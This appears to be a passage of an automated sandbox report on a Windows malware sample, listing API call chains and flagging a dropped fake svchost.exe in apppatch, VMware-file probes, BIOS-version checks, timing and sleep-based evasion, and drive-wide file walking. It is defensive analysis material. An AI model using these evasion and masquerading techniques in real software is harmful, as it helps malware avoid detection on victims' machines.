GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_00895720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_008A3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,9_2_02BF2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,9_2_02BF2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,9_2_02BD1170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,9_2_02BDD970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,9_2_02BF1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,9_2_02BD3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,9_2_02BECE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,9_2_02BD1660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,9_2_02BD7FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,9_2_02BE5720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,9_2_02BF3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,9_2_02BF3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,9_2_02BF1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,9_2_02BEADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,9_2_02BF25C0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403A20
    Source: C:\Users\user\Desktop\arxtPs1STE.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-30456
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-30488
    Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-82503
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLL
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_02BC78A0
    Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 3946
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 804
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 761
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2840
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02BC79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_008E79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008979D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_008979D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BE79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,9_2_02BE79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeAPI coverage: 2.2 %
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep count: 3946 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep time: -394600s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 2680Thread sleep count: 804 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 2680Thread sleep time: -80400s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 4296Thread sleep count: 761 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 4296Thread sleep time: -76100s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep count: 2840 > 30
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep time: -284000s >= -30000s
    Source: C:\Windows\apppatch\svchost.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_008F9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008ED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_008FDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_008FDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_008D7680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008EE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_008A9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089D120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_008ADAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_008ADA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00887680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_00887680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089E6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,9_2_02BFDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,9_2_02BFDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF9910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_02BF9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BEE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BEE6B0
